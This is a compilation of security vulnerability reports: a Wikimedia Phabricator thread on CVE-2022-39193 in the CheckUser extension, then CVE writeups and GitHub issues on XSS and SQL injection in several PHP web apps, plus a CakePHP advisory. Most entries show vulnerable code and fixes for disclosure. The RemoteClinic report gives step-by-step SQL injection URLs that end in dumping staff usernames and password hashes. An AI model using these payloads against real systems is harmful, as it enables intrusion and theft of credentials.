An issue was discovered in the CheckUser extension for MediaWiki through 1.39.x. Various components of this extension can expose information on the performer of edits and logged actions. This information should not allow public viewing: it is supposed to be viewable only by users with checkuser access.

**

CVE-2022-39193: Edits with the performer suppressed still show the performer in results from the CheckUser extension

Closed, ResolvedPublicSecurity



**

Tested on a local instance running CheckUser and other extensions.

Followed the following steps:

*   Gave myself suppressor rights
*   Suppressed a test edit so that the edit had the following restrictions:

*   Removed suppressor rights from myself
*   Ran a check on the IP used (in this case a localhost IP as I'm running a local instance)
*   Scrolled down to the edit and saw:

The edit summary is correctly suppressed, but not the username. A CU could be running a check on a wide range or IP from running a check on a different account. They can then, without knowing the username, see the suppressed performer username.

To fix Lines 1931 down in SpecialCheckUser.php need to work out if the username / performer is suppressed for that edit.

This also affects Special:Investigate as shown below (same edit used):  

Summary:

*   For edits
    *   SpecialCheckUser - fix deployed
    *   SpecialInvestigate - fix deployed
    *   CU API - fix deployed
*   logged actions can not be fixed fully without a schema change (T324907)
    *   SpecialCheckUser - T326865
    *   SpecialInvestigate - T326866
    *   CU API - T326867

Risk Rating

Medium

Author Affiliation

Wikimedia Communities

*   Task Graph
*   Mentions

**Event Timeline**

There are a very large number of changes, so older changes are hidden. Show Older Changes

Comment Actions

I presume the backport patches need to be +2'd. If so, I'll look at doing that tomorrow UTC unless someone else gets there first.

Comment Actions

> I presume the backport patches need to be +2'd. If so, I'll look at doing that tomorrow UTC unless someone else gets there first.

Security Team will handle that with the release. No need to worry.

RhinosF1 renamed this task from Edits with the performer suppressed still show the performer in results from the CheckUser extension to CVE-2022-39193: Edits with the performer suppressed still show the performer in results from the CheckUser extension.Sep 2 2022, 5:58 PM

Comment Actions

@Zabe @Dreamy\_Jazz et al - the patch from T311337#8178549 was deployed today:

2022-09-12 - 19:53 sbassett: Deployed security patch for T311337

It applied fine and didn't appear to cause any errors on any related CheckUser pages (at least not according to logstash). @Mstyles and I weren't really able to thoroughly test the patch in production though, as we don't have os anywhere. So if someone else could test a bit more and confirm that the issue does appear to be resolved within production, that would be great. If the patch does not appear to have solved the issue completely, we can always pull it off of production, test a bit more and deploy a rev 2. Also now tracking at T276237 (was already tracked at T311785).

Comment Actions

Nice.

What have you not been able to test on production wikis? I have CU and OS on enwiki. Through a test have been able to verify that the performer still shows to OS'ers when suppressed (which is expected). By extension I was also able to verify that it does not throw any errors visible to the user. If looking for the check in log stash to check backend errors, I added the ticket number for this task in the reason for the check.

Can I have access to T276237 (if it's general purpose and not specific to CheckUser then it's fine)?

Comment Actions

T276237 is the list of currently deployed security patches. Is there a reason you want access to that list?

Comment Actions

I wasn't sure by the comment above whether that was specific to CheckUser (and so somewhere I might be able to help) or not. As it's just a general purpose ticket for deployed security patches I don't want access. Thanks.

Comment Actions

> I wasn't sure by the comment above whether that was specific to CheckUser (and so somewhere I might be able to help) or not. As it's just a general purpose ticket for deployed security patches I don't want access. Thanks.

No problem. Access to T276237 is really only necessary if you're helping out with wikimedia-deployed security patches or are helping out with the quarterly MediaWiki security releases.

> What have you not been able to test on production wikis? I have CU and OS on enwiki. Through a test have been able to verify that the performer still shows to OS'ers when suppressed (which is expected). By extension I was also able to verify that it does not throw any errors visible to the user. If looking for the check in log stash to check backend errors, I added the ticket number for this task in the reason for the check.

Well, nobody on the Security-Team currently has OS on any of the production projects, so not much. It sounds like all we'd still want to confirm is that an OS'd target is now hidden to non-OS CUs on a production project when viewing related data during a CU check. If someone can create a suppressed edit like the one you describe in the task on testwiki, then I can run a CU against the user/IP and confirm I cannot view the target (I have plain old CU on testwiki). Thanks.

Comment Actions

I don't think anyone has OS on test.wikipedia.org currently but based on searching the user rights log Martin Urbanec had OS rights back in February this year. Not sure the process of getting OS on test wikis but they may be someone to contact.

Comment Actions

> @Urbanecm for the above, as you are already a subscriber here. Perhaps you could set up this edit?

It doesn't have to be testwiki, that was just convenient for me :) Looks like most enwiki CUs have OS, but there are a few that do not, if we could persuade one of them to help test there.

Comment Actions

I'll wait for Urbancem's response, but otherwise GeneralNotability is an enwiki CU but not OS that I think would be happy to help.

Comment Actions

@sbassett I have coordinated with a enwiki CU who is not an OS and followed the steps:

1.  Had them make a test edit (in this case one in their sandbox)
2.  Suppressed their username in this edit
3.  Got them to run a check on themselves
4.  Asked them to verify what they see
5.  Unsuppressed the edit
6.  Asked them to re-run the check to see any difference

The test was a success with the first check (while the edit having the username suppressed) resulting in:

> diff hist Page timestamp (Username or IP removed) summary

and the second check resulting in:

> diff hist Page timestamp CU without OS talk contribs block Previously blocked Autopatrolled, Checkusers, Administrators summary

I've removed the identifying information about the results and the lack of brackets is due to T223871 et. al. making it not possible to copy out the content defined by CSS. I can (privately) detail the particular edit used if there are logs you want to consult, but would want to only do that on a task that won't become public.

Comment Actions

The fix has not addressed the API (Investigate is in a subtask) but the fix for the API should be relatively similar I'm thinking.

Comment Actions

I'm also not sure whether it would be a good idea to make this task public until the fix is also applied to logged actions as it not being fixed has been detailed here.

Comment Actions

> @sbassett I have coordinated with a enwiki CU who is not an OS and followed the steps:  
> ...  
> The test was a success with the first check (while the edit having the username suppressed) resulting in:
> 
> > diff hist Page timestamp (Username or IP removed) summary
> 
> and the second check resulting in:
> 
> > diff hist Page timestamp CU without OS talk contribs block Previously blocked Autopatrolled, Checkusers, Administrators summary

Excellent, thanks for coordinating all of this.

> I've removed the identifying information about the results and the lack of brackets is due to T223871 et. al. making it not possible to copy out the content defined by CSS. I can (privately) detail the particular edit used if there are logs you want to consult, but would want to only do that on a task that won't become public.

I think we're ok, I trust your reporting of the above test with the enwiki CU.

> The fix has not addressed the API (Investigate is in a subtask) but the fix for the API should be relatively similar I'm thinking.

Yes, we'll need to file another task for that, most likely, just to keep things organized.

> I'm also not sure whether it would be a good idea to make this task public until the fix is also applied to logged actions as it not being fixed has been detailed here.

Yes, I'll make a note on the supplemental security release about this.

Comment Actions

@mmartorana wasn't this supposed to stay private as the fix is not in place for logged actions and for Investigate for all actions?

> > I'm also not sure whether it would be a good idea to make this task public until the fix is also applied to logged actions as it not being fixed has been detailed here.
> 
> Yes, I'll make a note on the supplemental security release about this.

sbassett set Security to Software security bug.Oct 5 2022, 3:19 PM

sbassett changed the visibility from "Public (No Login Required)" to "Custom Policy".

Comment Actions

Let's keep this private until the API and Special:Investigate patches get CR'd and deployed.

Comment Actions

> @mmartorana wasn't this supposed to stay private as the fix is not in place for logged actions and for Investigate for all actions?

We had hoped to include this and the related issues within the upcoming supplemental security release (T311785) - which we plan to release today. But unfortunately, given the timing of things and that the other two bugs either don't have patches or haven't been CR'd and deployed yet, I think we should keep this task private (I just did that) and plan to release it with the _next_ supplemental security release when the remaining issues should be addressed.

Comment Actions

Unless I'm wrong this is also not resolved as the fix for logged actions is not in place and won't be without a Schema-change.

If desired I could create a new ticket for logged actions specifically, though it's already been mentioned several times throughout this ticket and as such making this task public would make creating a different task which is private not be different from a public task until a fix patch was proposed.

Comment Actions

> If desired I could create a new ticket for logged actions specifically, though it's already been mentioned several times throughout this ticket and as such making this task public would make creating a different task which is private not be different from a public task until a fix patch was proposed.

This should be a separate (sub-)task at this point. This task was also made private again until the various sub-tasks have at least been patched within wikimedia production.

Comment Actions

Hey, is anyone opposing pushing T311337#8178549 through gerrit? I don't really think that this is very risky and I don't really like the idea of having this living as a sec patch for an eternity, since it is not really foreseeable when all those subtasks (including the schema change) are resolved. The patch for T207094 has also been pushed through gerrit while similar issues still exist.

I am fine with keeping this task private since it does contain direct information about those other issues.

Comment Actions

I wouldn't oppose it. Perhaps a subtask could be created that is for hiding the performer for edits which also doesn't make it very obvious that logged actions are not fixed. The patch then could link to that instead?

Comment Actions

> Hey, is anyone opposing pushing T311337#8178549 through gerrit? I don't really think that this is very risky and I don't really like the idea of having this living as a sec patch for an eternity, since it is not really foreseeable when all those subtasks (including the schema change) are resolved. The patch for T207094 has also been pushed through gerrit while similar issues still exist.

It likely wouldn't be an eternity. We had hoped for the sub-tasks T316414 and T318166 to have patches written and deployed last quarter, but that didn't happen. So it will likely be this quarter. T318166 already has a +2'd patch and can likely go out during next Monday's security deployment window (or sooner) and T316414 should have a patch up for review soon.

> I am fine with keeping this task private since it does contain direct information about those other issues.

It does, since it's the same issue, just for two different layers, which would likely be one of the first things a hypothetical attacker would check.

Comment Actions

Unless I'm missing something this can be set to public now too?

Comment Actions

> Unless I'm missing something this can be set to public now too?

It already should be, I believe.

Comment Actions

> > Unless I'm missing something this can be set to public now too?
> 
> It already should be, I believe.

Hmm. Got confused by the task description editing window saying "IMPORTANT: This report is restricted to members of security, subscribers, and the author." Obviously that doesn't change when the task is set to public.

Comment Actions

Thanks for the help with this all (and the security team for guiding me through). One more question for @sbassett / @Mstyles: Should the new tasks be associated with the CVE that these now resolved tasks are associated with (CVE-2022-39193)?

Comment Actions

> Thanks for the help with this all (and the security team for guiding me through). One more question for @sbassett / @Mstyles: Should the new tasks be associated with the CVE that these now resolved tasks are associated with (CVE-2022-39193)?

Let's get a separate one for the log events piece, as I think it's a distinct-enough issue. And the related tasks for that can then roll out (hopefully) with the next supplemental security release.

Comment Actions

> Ok, this likely needs a redeploy then.

Er, actually, the patch on production for wmf.18 seems fine:

52         $user = new UserIdentityValue( $row->cuc\_user ?? 0, $row->cuc\_user\_text );
53 -       if ( !IPUtils::isIPAddress( $user ) && !$user->isRegistered() ) {
54 -           $templateParams\['userLinkClass'\] = 'mw-checkuser-nonexistent-user';
55 +       if ( $row->cuc\_type == RC\_EDIT || $row->cuc\_type == RC\_NEW ) {
56 +           $hidden = !$this->usernameVisibility\[$row->cuc\_this\_oldid\];

No clue why git formatted my rev3 patch with line 52 getting removed. Sorry for the false alarm.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-39193: Edits with the performer suppressed still show the performer in results from the CheckUser extension

SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd (on March 13, 2021), allows attackers to execute arbitrary commands via the contact and doctor parameters to /search.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-48120: in search.php has sql injection · Issue #32 · kishan0725/Hospital-Management-System

Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/book. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the writer parameter.

50 XSS vulnerabilities.

Different sources that saved in the database in this project.

// In file application/models/M\_book.php
$object\=array(
      'book\_title'\=>$this\->input\->post('book\_title'),
      'year'\=>$this\->input\->post('year'),
      'price'\=>$this\->input\->post('price'),
      'category\_code'\=>$this\->input\->post('category'),
      'publisher'\=>$this\->input\->post('publisher'),
      'writer'\=>$this\->input\->post('writer'),
      'stock'\=>$this\->input\->post('stock')
    );
return $this\->db\->insert('book', $object);

// In file application/models/M\_transaction.php
$object\=array(
    'user\_code'\=>$this\->input\->post('user\_code'),
    'buyer\_name'\=>$this\->input\->post('buyer\_name'),
    'tgl' => date('Y-m-d'),
    'total'\=>$this\->input\->post('total'),
    'bookname'\=>$this\->input\->post('bookname'),
    'book\_qty'\=>$this\->input\->post('book\_qty'),
  );
$this\->db\->insert('transaction', $object);

These sources will pass from the database to the view files.

// In file application/views/v\_book.php
<td><?=$book\->book\_title?></td\>
<td\><?=$book\->year?></td\>
<td\><?=$book\->category\_name?></td\>
<td\><?=$book\->publisher?></td\>
<td\><?=$book\->writer?></td\>
<td\><?=$book\->stock?></td\>

// In file application/views/v\_transaction.php
<td\><?=$book\->book\_title?></td\>
<td\><?=$book\->category\_name?></td\>
<td class\="text-right"\>$<?=$book\->price?></td\>
<td class\="text-right"\><?=$book\->stock?></td\>
                                                      
<?php foreach ($transaction as $transaction): ?>
<option class\="text-dark" value\="<?=$transaction\->user\_code?>"\><?=$transaction\->fullname?></option\>
<?php endforeach ?>

CVE-2023-23024: XSS in Book Store

Cross Site Scripting (XSS) vulnerability in Kalkun 0.8.0 via username input in file User_model.php.

Link: https://github.com/kalkun-sms/Kalkun

XSS vulnerability with the user name.

We see that the username will be setted in the DB without sanitization in file Kalkun-devel\\application\\models\\User\_model.php

$this\->db\->set('username', trim($this\->input\->post('username')));

Then the username retrieved from the DB and set in the session then redirect to 'kalkun' in file Kalkun-devel\\application\\models\\Kalkun\_model.php

function login(){
  $username = $this\->input\->post('username');
  $this\->db\->from('user');
  $this\->db\->where('username', $username);
  $query = $this\->db\->get();
  
  if ($query\->num\_rows() === 1 && password\_verify($this\->input\->post('password'), $query\->row('password')))
  {
	  //..
	  $this\->session\->set\_userdata('username', $query\->row('username'));
         //...
  }
  if ($this\->input\->post('r\_url'))
  {
  redirect($this\->input\->post('r\_url'));
  }
  else
  {
  redirect('kalkun');
  }
}

In file Kalkun-devel\\application\\controllers\\Kalkun.php

function index()
{
  //...
  $this\->load\->view('main/layout', $data);
}

In file Kalkun-devel\\application\\views\\main\\layout.php

<?php $this\->load\->view('main/dock');?>

Finally, in file Kalkun-devel\\application\\views\\main\\dock.php

<?php echo $this\->session\->userdata('username');?>

CVE-2023-23015: XSS Kalkun

Cross Site Scripting (XSS) vulnerability in InventorySystem thru commit e08fbbe17902146313501ed0b5feba81d58f455c (on Apr 23, 2021) via edit_store_name and edit_active inputs in file InventorySystem.php.

Hello,

I would like to report for possible XSS vulnerabilities.

For example,

In file InventorySystem-master\\application\\controllers\\Stores.php in update function

$data = array(
	'name' => $this\->input\->post('edit\_store\_name'),
	'active' => $this\->input\->post('edit\_active'),	
);

$update = $this\->model\_stores\->update($data, $id);

In file InventorySystem-master\\application\\models\\Model\_stores.php

public function update($data, $id){
  if($data && $id) {
	  $this\->db\->where('id', $id);
	  $update = $this\->db\->update('stores', $data);
	  return ($update == true) ? true : false;
  }
}

Then In file InventorySystem-master\\application\\controllers\\Stores.php

public function fetchStoresDataById($id) {
  if($id) {
	  $data = $this\->model\_stores\->getStoresData($id);
	  echo json\_encode($data);
  }
}

In file InventorySystem-master\\application\\models\\Model\_stores.php

public function getStoresData($id = null){
  if($id) {
	  $sql = "SELECT \* FROM \`stores\` where id = ?";
	  $query = $this\->db\->query($sql, array($id));
	  return $query\->row\_array();
  }
  
  $sql = "SELECT \* FROM \`stores\`";
  $query = $this\->db\->query($sql);
  return $query\->result\_array();
}

CVE-2023-23014: Possible XSS vulnerabilities · Issue #23 · ronknight/InventorySystem

Cross Site Scripting (XSS) vulnerability in craigrodway classroombookings 2.6.4 allows attackers to execute arbitrary code or other unspecified impacts via the input bgcol in file Weeks.php.

Link: https://github.com/craigrodway/classroombookings

XSS vulnerability.

In file classroombookings-master\\application\\controllers\\Weeks.php in function save\_week

the input 'bgcol' will be saved in the DB and passed to the view when it will be printed without sanitization.

$data = array(
	'name' => $this\->input\->post('name'),
	'bgcol' => $this\->input\->post('bgcol'),
);
if ($week\_id = $this\->weeks\_model\->insert($data)) {
//...
}

In file classroombookings-master\\application\\models\\Weeks\_model.php

public function insert($data){
  $data = $this\->sleep\_values($data);
  
  $insert = $this\->db\->insert($this\->table, $data);
  
  return $insert ? $this\->db\->insert\_id() : FALSE;
}

In file classroombookings-master\\application\\controllers\\Weeks.php in function save\_week

public function index(){
  $this\->data\['weeks'\] = $this\->weeks\_model\->get\_all();
  $this\->data\['title'\] = $this\->data\['showtitle'\] = 'Timetable Weeks';
  
  $body = $this\->load\->view('weeks/index', $this\->data, TRUE);
  
  $this\->data\['body'\] = $body;
  
  return $this\->render();
}

In file classroombookings-master\\application\\models\\Weeks\_model.php

public function get\_all(){
  $query = $this\->db\->from($this\->table)
	  ->order\_by('name', 'ASC')
	  ->get();
  
  if ($query\->num\_rows() > 0) {
	  $result = $query\->result();
	  //..
	  return $result;
  }
}

The In file C:\\transfer\_projects\\classroombooking\\classroombookings-master\\application\\views\\weeks\\index.php

<?php
foreach ($weeks as $week) {
//...
	$dot = week\_dot($week);
  echo "<td style='text-align:center'>{$dot}</td>";
//...
}
?>

In file classroombookings-master\\application\\helpers\\week\_helper.php

function week\_dot($week, $size = 'md')
{
	$col = $week\->bgcol;
	$col = str\_replace('#', '', $col);
	$col = '#' . $col;

	$out = "<span class='dot dot-week dot-size-{$size}' style='background-color:{$col}'></span>";
	return $out;
}

CVE-2023-23012: XSS in classroombookings

Cross Site Scripting (XSS) vulnerability in Ecommerce-CodeIgniter-Bootstrap thru commit d5904379ca55014c5df34c67deda982c73dc7fe5 (on Dec 27, 2022), allows attackers to execute arbitrary code via the languages and trans_load parameters in file add_product.php.

@@ -18,37 +18,37 @@ <div class\="form-group available-translations"\> <b\>Languages</b\> <?php foreach ($languages as $language) { ?> <button type\="button" data-locale-change\="<?= $language\->abbr ?>" class\="btn btn-default locale-change text-uppercase <?= $language\->abbr == MY\_DEFAULT\_LANGUAGE\_ABBR ? 'active' : '' ?>"\> <img src\="<?= base\_url('attachments/lang\_flags/' . $language\->flag) ?>" alt\=""\> <?= $language\->abbr ?> <button type\="button" data-locale-change\="<?= htmlspecialchars($language\->abbr) ?>" class\="btn btn-default locale-change text-uppercase <?= $language\->abbr == MY\_DEFAULT\_LANGUAGE\_ABBR ? 'active' : '' ?>"\> <img src\="<?= base\_url('attachments/lang\_flags/' . htmlspecialchars($language\->flag)) ?>" alt\=""\> <?= htmlspecialchars($language\->abbr) ?> </button\> <?php } ?> </div\> <?php $i = 0; foreach ($languages as $language) { ?> <div class\="locale-container locale-container-<?= $language\->abbr ?>" <?= $language\->abbr == MY\_DEFAULT\_LANGUAGE\_ABBR ? 'style="display:block;"' : '' ?>\> <input type\="hidden" name\="translations\[\]" value\="<?= $language\->abbr ?>"\> <div class\="locale-container locale-container-<?= htmlspecialchars($language\->abbr) ?>" <?= $language\->abbr == MY\_DEFAULT\_LANGUAGE\_ABBR ? 'style="display:block;"' : '' ?>\> <input type\="hidden" name\="translations\[\]" value\="<?= htmlspecialchars($language\->abbr) ?>"\> <div class\="form-group"\> <img src\="<?= base\_url('attachments/lang\_flags/' . $language\->flag) ?>" alt\="<?= $language\->name ?>" class\="language"\> <input type\="text" name\="title\[\]" placeholder\="<?= lang('vendor\_product\_name') ?>" value\="<?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['title'\]) ? $trans\_load\[$language\->abbr\]\['title'\] : '' ?>" class\="form-control"\> <img src\="<?= base\_url('attachments/lang\_flags/' . htmlspecialchars($language\->flag)) ?>" alt\="<?= htmlspecialchars($language\->name) ?>" class\="language"\> <input type\="text" name\="title\[\]" placeholder\="<?= lang('vendor\_product\_name') ?>" value\="<?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['title'\]) ? htmlentities($trans\_load\[$language\->abbr\]\['title'\], ENT\_QUOTES, 'UTF-8') : '' ?>" class\="form-control"\> </div\> <label\><?= lang('vendor\_product\_description') ?> <img src\="<?= base\_url('attachments/lang\_flags/' . $language\->flag) ?>" alt\="<?= $language\->name ?>"\></label\> <label\><?= lang('vendor\_product\_description') ?> <img src\="<?= base\_url('attachments/lang\_flags/' . htmlspecialchars($language\->flag)) ?>" alt\="<?= htmlspecialchars($language\->name) ?>"\></label\> <div class\="form-group"\> <textarea class\="form-control" name\="description\[\]" id\="description<?= $i ?>"\><?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['description'\]) ? $trans\_load\[$language\->abbr\]\['description'\] : '' ?></textarea\> <textarea class\="form-control" name\="description\[\]" id\="description<?= $i ?>"\><?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['description'\]) ? htmlentities($trans\_load\[$language\->abbr\]\['description'\], ENT\_QUOTES, 'UTF-8') : '' ?></textarea\> </div\> <script\> CKEDITOR.replace('description<?= $i ?>'); CKEDITOR.config.entities \= false; </script\> <div class\="form-group"\> <img src\="<?= base\_url('attachments/lang\_flags/' . $language\->flag) ?>" alt\="" class\="language"\> <input type\="text" name\="price\[\]" value\="<?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['price'\]) ? $trans\_load\[$language\->abbr\]\['price'\] : '' ?>" placeholder\="<?= lang('vendor\_price') ?>" class\="form-control"\> <img src\="<?= base\_url('attachments/lang\_flags/' . htmlspecialchars($language\->flag)) ?>" alt\="" class\="language"\> <input type\="text" name\="price\[\]" value\="<?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['price'\]) ? htmlentities($trans\_load\[$language\->abbr\]\['price'\], ENT\_QUOTES, 'UTF-8') : '' ?>" placeholder\="<?= lang('vendor\_price') ?>" class\="form-control"\> </div\> <div class\="form-group"\> <img src\="<?= base\_url('attachments/lang\_flags/' . $language\->flag) ?>" alt\="" class\="language"\> <input type\="text" name\="old\_price\[\]" value\="<?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['old\_price'\]) ? $trans\_load\[$language\->abbr\]\['old\_price'\] : '' ?>" placeholder\="<?= lang('vendor\_old\_price') ?>" class\="form-control"\> <img src\="<?= base\_url('attachments/lang\_flags/' . htmlspecialchars($language\->flag)) ?>" alt\="" class\="language"\> <input type\="text" name\="old\_price\[\]" value\="<?= $trans\_load != null && isset($trans\_load\[$language\->abbr\]\['old\_price'\]) ? htmlentities($trans\_load\[$language\->abbr\]\['old\_price'\], ENT\_QUOTES, 'UTF-8') : '' ?>" placeholder\="<?= lang('vendor\_old\_price') ?>" class\="form-control"\> </div\> </div\> <?php

CVE-2023-23010: xss fixes · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d590437

SQL Injection vulnerability in RemoteClinic 2.0 allows attackers to execute arbitrary commands and gain sensitive information via the id parameter to /medicines/profile.php.

**Vulnerability Description:**

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (My Medicine Profile ID is **30**)

**Steps to Reproduce:**

1.  Login in Application as Doctor.
2.  Click on Directory.

3.  Click on any medicine profile.

4.  Now PUT single quote in medicine profile endpoint.

5.  Balance the Query to Remove Errors.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=30%27--%20-
    

6.  Find Total Numbers of Columns.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207--%20-
    

7.  Find Vulnerable Columns.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7--%20-
    

8.  Now Extract **Current Database** and **Current User**.
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20-
    

9.  Extract All **Users** and **Passwords** (md5 hash).
    
    **Full URL**: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group\_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p\_staff\_dir--%20-
    

**Impact:**

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.

CVE-2022-48152: SQL Injection in /medicines/profile.php via `id` parameter · Issue #20 · remoteclinic/RemoteClinic

Multiple SQL Injection vulnerabilies in tourist5 Online-food-ordering-system 1.0.

Hi,

You have lots of sql injection vulnerabilities. You can write your code with parametrized query for mitigation of sql injection.

Example-1:

https://github.com/tourist5/Online-food-ordering-system/blob/main/all-tickets.php

if(isset($\_GET\['status'\])){  
$status = $\_GET\['status'\];  
}  
else{  
$status = '%';  
}  
$sql = mysqli\_query($con, "SELECT \* FROM comments WHERE status LIKE '$status';");

You can exploit the parameter of $status.

Example-2:

https://github.com/tourist5/Online-food-ordering-system/blob/main/view-ticket.php

You can exploit $id parameter.

CVE-2020-29297: SQL Injection Vulnerabilities · Issue #1 · tourist5/Online-food-ordering-system

### Impact

The `Cake\Database\Query::limit()` and `Cake\Database\Query::offset()` methods are vulnerable to SQL injection if passed un-sanitized user request data.

### Patches
This issue has been fixed in 4.2.12, 4.3.11, 4.4.10

### Workarounds

Using CakePHP's Pagination library will mitigate this issue, as will validating or casting parameters to these methods.

### References

https://bakery.cakephp.org/2023/01/06/cakephp_4211_4311_4410_released.html


**Package**

composer cakephp/cakephp (Composer)

**Affected versions**

\>= 4.2.0, < 4.2.12

\>= 4.3.0, < 4.3.11

\>= 4.4.0, < 4.4.10

**Patched versions**

4.2.12

4.3.11

4.4.10

**Description**

**Impact**

The Cake\Database\Query::limit() and Cake\Database\Query::offset() methods are vulnerable to SQL injection if passed un-sanitized user request data.

**Patches**

This issue has been fixed in 4.2.12, 4.3.11, 4.4.10

**Workarounds**

Using CakePHP's Pagination library will mitigate this issue, as will validating or casting parameters to these methods.

**References**

https://bakery.cakephp.org/2023/01/06/cakephp\_4211\_4311\_4410\_released.html

**References**

*   GHSA-6g8q-qfpv-57wp
*   https://nvd.nist.gov/vuln/detail/CVE-2023-22727
*   cakephp/cakephp@3f463e7
*   https://bakery.cakephp.org/2023/01/06/cakephp\_4211\_4311\_4410\_released.html

 markstory published the maintainer security advisory

Jan 17, 2023

Tag

#php